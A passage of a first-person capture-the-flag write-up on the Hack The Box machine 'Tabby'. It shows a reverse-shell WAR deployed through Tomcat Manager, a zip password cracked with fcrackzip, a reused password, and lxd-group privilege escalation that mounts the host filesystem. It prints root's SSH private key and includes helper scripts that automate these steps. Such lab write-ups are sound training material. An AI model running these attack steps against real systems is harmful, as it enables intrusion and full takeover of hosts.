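The same deployment can be written with the credentials passed through curl's -u option instead of the URL, which avoids URL-encoding problems with characters such as $ and !. This is a sketch rather than the exact commands I ran; the helper names are hypothetical, while the /manager/text/deploy and /manager/text/undeploy endpoints are those of the Tomcat Manager text interface.

```shell
# Build the Tomcat Manager text-interface URL for an action.
# Arguments: host:port, action (deploy or undeploy), context path.
manager_text_url() {
    printf 'http://%s/manager/text/%s?path=%s\n' "$1" "$2" "$3"
}

# Upload a WAR with HTTP PUT (-T, the short form of --upload-file).
# Arguments: host:port, user:password, WAR file, context path.
deploy_war() {
    curl -s -u "$2" -T "$3" "$(manager_text_url "$1" deploy "$4")"
}

# Remove the application again when finished.
# Arguments: host:port, user:password, context path.
undeploy_war() {
    curl -s -u "$2" "$(manager_text_url "$1" undeploy "$3")"
}

# Example (single quotes keep the shell from expanding $ and !):
# deploy_war 10.10.10.194:8080 'tomcat:$3cureP4s5w0rd123!' rev443.war /new-news
```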

I switched over to my nc listener and saw that I had caught a reverse shell in the context of user tomcat.

nc -nvlp 443

listening on [any] 443 ...

connect to [10.10.15.55] from (UNKNOWN) [10.10.10.194] 52578

id

uid=997(tomcat) gid=997(tomcat) groups=997(tomcat)

Lateral Move To User Ash

Unfortunately, the account I had gained access to was just a service account without many permissions. Thanks to the /etc/passwd dump from the LFI I had performed, I knew that the only other non-root, non-service account on the target machine was ash. Keeping this in mind, the first thing I decided to check was the /files and /files/archive folders I had discovered in the web root during my initial enumeration. I decided to start there because I knew that the tomcat user would most likely have read permissions on files located in the /var/www/html subdirectories.

I performed a half-upgrade of my shell so I could get a normal bash prompt, switched over to /var/www/html/files, and began enumerating.

id

uid=997(tomcat) gid=997(tomcat) groups=997(tomcat)

cd /var/www/html/files

cd /var/www/html/files

ls -lAh

ls -lAh

total 28K

-rw-r--r-- 1 ash ash 8.6K Jun 16 13:42 16162020_backup.zip

drwxr-xr-x 2 root root 4.0K Jun 16 20:13 archive

drwxr-xr-x 2 root root 4.0K Jun 16 20:13 revoked_certs

-rw-r--r-- 1 root root 6.4K Jun 16 11:25 statement

I downloaded the zip file to my Kali host, then used binwalk to get a quick summary of the file.

wget http://10.10.10.194/files/16162020_backup.zip

--2020-11-06 10:30:39-- http://10.10.10.194/files/16162020_backup.zip

Connecting to 10.10.10.194:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 8716 (8.5K) [application/zip]

Saving to: ‘16162020_backup.zip’

16162020_backup.zip 100%[==============================================>] 8.51K --.-KB/s in 0.006s

2020-11-06 10:30:39 (1.51 MB/s) - ‘16162020_backup.zip’ saved [8716/8716]

binwalk 16162020_backup.zip

DECIMAL HEXADECIMAL DESCRIPTION

--------------------------------------------------------------------------------

0 0x0 Zip archive data, at least v1.0 to extract, name: var/www/html/assets/

78 0x4E Zip archive data, encrypted at least v2.0 to extract, compressed size: 338, uncompressed size: 766, name: var/www/html/favicon.ico

514 0x202 Zip archive data, at least v1.0 to extract, name: var/www/html/files/

591 0x24F Zip archive data, encrypted at least v2.0 to extract, compressed size: 3255, uncompressed size: 14793, name: var/www/html/index.php

3942 0xF66 Zip archive data, encrypted at least v1.0 to extract, compressed size: 2906, uncompressed size: 2894, name: var/www/html/logo.png

6943 0x1B1F Zip archive data, encrypted at least v2.0 to extract, compressed size: 114, uncompressed size: 123, name: var/www/html/news.php

7152 0x1BF0 Zip archive data, encrypted at least v2.0 to extract, compressed size: 805, uncompressed size: 1574, name: var/www/html/Readme.txt

8694 0x21F6 End of Zip archive, footer length: 22

Based on the binwalk results, some of the data in the archive was encrypted. I fed the zip file into fcrackzip in order to try to crack the password. I used the -u flag to use the unzip command to detect wrong passwords, -D to use a dictionary wordlist for the attack, and -p to specify the wordlist file to be used.

fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' 16162020_backup.zip

PASSWORD FOUND!!!!: pw == admin@it
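
Conceptually, a dictionary attack of this kind is a loop that tries each candidate and stops at the first one the archive accepts. The sketch below illustrates that idea with unzip's integrity test; it is not how fcrackzip is implemented and would be far slower on a list the size of rockyou.txt. Both function names are hypothetical.

```shell
# Succeed if the candidate password passes unzip's integrity test (-t).
# Arguments: zip file, candidate password.
zip_password_ok() {
    unzip -P "$2" -tqq "$1" >/dev/null 2>&1 </dev/null
}

# Try each line of a wordlist with a checker command and print the first hit.
# Arguments: wordlist file, then the checker command and its leading
# arguments; each candidate is appended as the final argument.
first_match() {
    wordlist=$1
    shift
    while IFS= read -r candidate; do
        if "$@" "$candidate"; then
            printf '%s\n' "$candidate"
            return 0
        fi
    done < "$wordlist"
    return 1
}

# Example:
# first_match /usr/share/wordlists/rockyou.txt zip_password_ok 16162020_backup.zip
```

Keeping the checker separate from the loop means the same loop can be reused against other targets by swapping in a different checker function.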

I unzipped the archive with the password, but it just appeared to be a backup of the existing site source; there wasn't anything new in any of the files. Since I had a new password and I knew that I couldn't use it over SSH, I attempted to reuse it the only other way I could think of: with su.

/var/lib/tomcat9$ su ash

su ash

Password: admin@it

Escalation of Privilege

Now I was ready to escalate to root. When I had checked the user details of ash with id I had noticed that the user was a member of the lxd group.

id

id

uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
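
Membership in groups such as lxd is worth flagging automatically, because members can manage containers on the host and that access is effectively root-equivalent. A minimal sketch of such a check over id output follows; the function name id_has_group is hypothetical.

```shell
# Read `id` output on stdin and succeed if the named group appears in the
# groups= list. Arguments: group name.
id_has_group() {
    sed -n 's/.*groups=\([^ ]*\).*/\1/p' | tr ',' '\n' | grep -q "^[0-9]*($1)\$"
}

# Example:
# id | id_has_group lxd && echo "lxd group member"
```

Only the groups= field is inspected, so a user name that happens to match the group name does not cause a false positive.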

Since that was not a standard group membership, I decided to Google for more information on that group and its permissions. This led me to the "'lxd' Privilege Escalation" proof of concept exploit script on Exploit-DB.

Following the instructions in the PoC script's comments, I first downloaded the build-alpine script from GitHub.

wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine

--2020-11-06 11:01:39-- https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine

Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 199.232.8.133

Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|199.232.8.133|:443... connected.

HTTP request sent, awaiting response... 200 OK

Length: 7498 (7.3K) [text/plain]

Saving to: ‘build-alpine’

build-alpine 100%[=============================================>] 7.32K --.-KB/s in 0s

2020-11-06 11:01:39 (32.4 MB/s) - ‘build-alpine’ saved [7498/7498]

Then I built the Alpine image tarball using the build-alpine shell script.

bash build-alpine

Determining the latest release... v3.12

Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.12/main/x86_64

Downloading alpine-mirrors-3.5.10-r0.apk

Downloading apk-tools-static-2.10.5-r1.apk

alpine-devel@lists.alpinelinux.org-4a6a0840.rsa.pub: OK

Verified OK

Selecting mirror http://dl-cdn.alpinelinux.org/alpine/v3.12/main

fetch http://dl-cdn.alpinelinux.org/alpine/v3.12/main/x86_64/APKINDEX.tar.gz

(1/19) Installing musl (1.1.24-r9)

(2/19) Installing busybox (1.31.1-r19)

Executing busybox-1.31.1-r19.post-install

(3/19) Installing alpine-baselayout (3.2.0-r7)

Executing alpine-baselayout-3.2.0-r7.pre-install

Executing alpine-baselayout-3.2.0-r7.post-install

(4/19) Installing openrc (0.42.1-r11)

Executing openrc-0.42.1-r11.post-install

(5/19) Installing alpine-conf (3.9.0-r1)

(6/19) Installing libcrypto1.1 (1.1.1g-r0)

(7/19) Installing libssl1.1 (1.1.1g-r0)

(8/19) Installing ca-certificates-bundle (20191127-r4)

(9/19) Installing libtls-standalone (2.9.1-r1)

(10/19) Installing ssl_client (1.31.1-r19)

(11/19) Installing zlib (1.2.11-r3)

(12/19) Installing apk-tools (2.10.5-r1)

(13/19) Installing busybox-suid (1.31.1-r19)

(14/19) Installing busybox-initscripts (3.2-r2)

Executing busybox-initscripts-3.2-r2.post-install

(15/19) Installing scanelf (1.2.6-r0)

(16/19) Installing musl-utils (1.1.24-r9)

(17/19) Installing libc-utils (0.7.2-r3)

(18/19) Installing alpine-keys (2.2-r0)

(19/19) Installing alpine-base (3.12.1-r0)

Executing busybox-1.31.1-r19.trigger

OK: 8 MiB in 19 packages

On my Kali host, I spun up a Python HTTP server to host the tarball.

pyserve

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
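Note that pyserve is not a standard command; it is a shortcut on my Kali host. The sketch below is one possible definition, assuming Python 3.7 or later is installed. The function body is an assumption for illustration and may not match the exact alias used here.

```shell
# pyserve [PORT] [DIRECTORY]
# Hypothetical shortcut: serve DIRECTORY (default: current directory)
# over HTTP on PORT (default: 80) using Python's built-in http.server.
pyserve() {
    local port=${1:-80} dir=${2:-.}
    python3 -m http.server "$port" --directory "$dir"
}
```

Binding to port 80 normally requires root, so on an unprivileged account something like pyserve 8000 is the safer choice.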

From the target host, I downloaded the tarball with wget.

wget http://10.10.14.29/alpine-v3.12-x86_64-20201106_1105.tar.gz

--2020-11-06 16:32:42-- http://10.10.14.29/alpine-v3.12-x86_64-20201106_1105.tar.gz

Connecting to 10.10.14.29:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 3185821 (3.0M) [application/gzip]

Saving to: ‘alpine-v3.12-x86_64-20201106_1105.tar.gz’

alpine-v3.12-x86_64 100%[===================>] 3.04M 2.33MB/s in 1.3s

2020-11-06 16:32:43 (2.33 MB/s) - ‘alpine-v3.12-x86_64-20201106_1105.tar.gz’ saved [3185821/3185821]

Uploading the PoC script and executing it on the target gave me some issues, so I used the script as a guide and performed each step manually on the target host. First, I imported the Alpine image from the uploaded tarball and initialized LXD. Then I created a container named privesc from that image, with the security.privileged option set to true.

lxc image import alpine-v3.12-x86_64-20201106_1105.tar.gz --alias alpine && lxd init --auto

If this is your first time running LXD on this machine, you should also run: lxd init

To start your first instance, try: lxc launch ubuntu:18.04

lxc init alpine privesc -c security.privileged=true

Creating privesc

Next, I created a disk device named giveMeRoot, set the source of the virtual disk to be / on the lxd host, and mounted it recursively to the path /mnt/root in the lxd container.

lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true

Device giveMeRoot added to privesc

At this point, if everything was configured correctly, I should have been able to start the container, drop into a shell inside it, and be root in the context of the container. Because the container was privileged, root inside it maps to uid 0 on the host, and because I had also mounted the target host's root filesystem at /mnt/root in the container, I would then be able to read and write all of the host's files as root.

I started the malicious container, opened a shell, and verified I was running as root.

lxc start privesc

lxc exec privesc sh

~ # id

uid=0(root) gid=0(root)
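For reference, the manual steps above can be collected into one small script. This is a sketch of my own and not the Exploit-DB PoC: the run and lxd_mount_host_root names are hypothetical, and it defaults to a dry run that only prints each command, so nothing is executed unless DRY_RUN=0 is set.

```shell
# run CMD [ARGS...]
# Prints the command when DRY_RUN is 1 (the default); executes it otherwise.
run() {
    if [ "${DRY_RUN:-1}" = 1 ]; then
        printf '%s\n' "$*"
    else
        "$@"
    fi
}

# lxd_mount_host_root TARBALL [ALIAS] [CONTAINER]
# Same sequence as the manual steps: import the image, initialise LXD,
# create a privileged container, attach the host's / at /mnt/root,
# start the container, and open a shell inside it.
lxd_mount_host_root() {
    local tarball=$1 alias=${2:-alpine} name=${3:-privesc}
    run lxc image import "$tarball" --alias "$alias"
    run lxd init --auto
    run lxc init "$alias" "$name" -c security.privileged=true
    run lxc config device add "$name" giveMeRoot disk source=/ path=/mnt/root recursive=true
    run lxc start "$name"
    run lxc exec "$name" sh
}
```

Calling lxd_mount_host_root alpine-v3.12-x86_64-20201106_1105.tar.gz prints the six commands in order, which is a handy checklist when the PoC script itself misbehaves.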

While this was enough for me to print the contents of the root.txt flag, my ultimate objective was to gain a full root-level shell on the target host. Since I could read any file on the target host's filesystem, I dumped the contents of root's id_rsa key file.

cat /mnt/root/root/.ssh/id_rsa

-----BEGIN OPENSSH PRIVATE KEY-----

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

-----END OPENSSH PRIVATE KEY-----

Then I saved the key file on my Kali host, used chmod to set SSH-compatible permissions, and tried to SSH into the target host as root.

nano id_rsa_root

chmod 600 id_rsa_root

ssh -i id_rsa_root root@10.10.10.194

The authenticity of host '10.10.10.194 (10.10.10.194)' can't be established.

ECDSA key fingerprint is SHA256:fMuIFpNbN9YiPCAj+b/iV5XPt9gNRdvR5x/Iro2HrKo.

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

Warning: Permanently added '10.10.10.194' (ECDSA) to the list of known hosts.

X11 forwarding request failed on channel 1

Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-31-generic x86_64)

* Documentation: https://help.ubuntu.com

* Management: https://landscape.canonical.com

* Support: https://ubuntu.com/advantage

System information as of Fri 06 Nov 2020 04:55:03 PM UTC

System load: 0.0 Processes: 202

Usage of /: 35.7% of 15.68GB Users logged in: 0

Memory usage: 49% IPv4 address for ens192: 10.10.10.194

Swap usage: 0% IPv4 address for lxdbr0: 10.238.192.1

0 updates can be installed immediately.

0 of these updates are security updates.

The list of available updates is more than a week old.

To check for new updates run: sudo apt update

Last login: Wed Jun 17 21:58:30 2020 from 10.10.14.2

root@tabby:~#

This confirmed that I had gained a full root-level compromise of the target host, tabby.htb.
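The key-handling step earlier in this section (paste into nano, then chmod 600) matters because the OpenSSH client refuses private keys that are readable by other users. A minimal sketch of doing both in one go is below; save_private_key is a hypothetical helper name of my own, and it simply reads the key from standard input.

```shell
# save_private_key DEST
# Reads key material from stdin and writes it to DEST so that the file is
# only ever readable and writable by its owner (mode 600).
save_private_key() {
    local dest=$1
    # Subshell keeps the restrictive umask from leaking into the caller.
    ( umask 077 && cat > "$dest" ) || return 1
    chmod 600 "$dest"
}
```

Used as save_private_key id_rsa_root, followed by pasting the key and pressing Ctrl-D, this leaves a file that ssh -i id_rsa_root root@10.10.10.194 will accept.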

Final Thoughts

This was another really fun machine for me to work through. I liked that the LFI chaining didn't require any ridiculous directory fuzzing, which made an attack path that can easily feel too CTF-like or "fake" feel realistic in this instance. I also really liked that the file locations were leaked through accessible pages. I had definitely skimmed past the key bit of information on the Tomcat post-install page a few times before I realized what I was looking at. I really enjoyed the privilege escalation on this box as well. It felt like a common real-world account permissions misconfiguration and, just like Admirer, even though the intended escalation method was very obvious, it required a little more than just pushing a pwn-button. I think the best part about this machine was that it makes it easy to tell whether you really understand the privesc method. If you know what you're trying to accomplish, using root's SSH key to log in and dump the root.txt flag from an SSH session will take maybe thirty more seconds, but if you don't understand what is going on, you'll just wind up dumping root.txt from inside the container shell.